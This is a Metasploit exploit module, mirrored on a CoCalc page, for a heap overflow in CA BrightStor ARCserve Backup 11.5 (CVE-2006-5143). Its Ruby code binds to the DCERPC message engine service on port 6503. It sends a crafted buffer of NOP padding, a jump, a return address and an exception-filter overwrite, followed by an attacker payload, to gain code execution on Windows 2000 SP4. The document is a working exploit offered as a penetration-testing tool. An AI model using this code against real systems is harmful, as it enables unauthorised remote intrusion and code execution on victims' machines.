CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/brightstor/message_engine_heap.rb
Views: 11783
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = AverageRanking

8


9
  include Msf::Exploit::Remote::DCERPC

10


11
  def initialize(info = {})

12
    super(update_info(info,

13
      'Name'           => 'CA BrightStor ARCserve Message Engine Heap Overflow',

14
      'Description'    => %q{

15
          This module exploits a heap overflow in Computer Associates BrightStor ARCserve Backup

16
        11.5. By sending a specially crafted RPC request, an attacker could overflow the

17
        buffer and execute arbitrary code.

18
      },

19
      'Author'         => [ 'MC' ],

20
      'License'        => MSF_LICENSE,

21
      'References'     =>

22
        [

23
          [ 'CVE', '2006-5143' ],

24
          [ 'OSVDB', '29533' ],

25
          [ 'BID', '20365' ],

26
        ],

27
      'Privileged'     => true,

28
      'DefaultOptions' =>

29
        {

30
          'EXITFUNC' => 'process',

31
        },

32
      'Payload'        =>

33
        {

34
          'Space'    => 800,

35
          'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",

36
          'StackAdjustment' => -3500,

37
        },

38
      'Platform' => 'win',

39
      'Targets'  =>

40
        [

41
          ['Windows 2000 SP4 English',   { 'Ret' => 0x7c2f6cc8, 'UEF' => 0x7c54144c } ],

42
        ],

43
      'DisclosureDate' => '2006-10-05',

44
      'DefaultTarget' => 0))

45


46
    register_options(

47
      [

48
        Opt::RPORT(6503)

49
      ])

50
  end

51


52
  def exploit

53
    connect

54


55
    handle = dcerpc_handle('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])

56
    print_status("Binding to #{handle} ...")

57


58
    dcerpc_bind(handle)

59
    print_status("Bound to #{handle} ...")

60


61
    # straight forward heap stuffz

62
    sploit =  make_nops(680) + "\xeb\x0a" + make_nops(2) + [ target.ret ].pack('V')

63
    sploit << [ target['UEF'] ].pack('V') + payload.encoded

64


65
    print_status("Trying target #{target.name}...")

66


67
      begin

68
        dcerpc_call(43, sploit)

69
        rescue Rex::Proto::DCERPC::Exceptions::NoResponse

70
      end

71


72
    handler

73
    disconnect

74
  end

75
end

76


77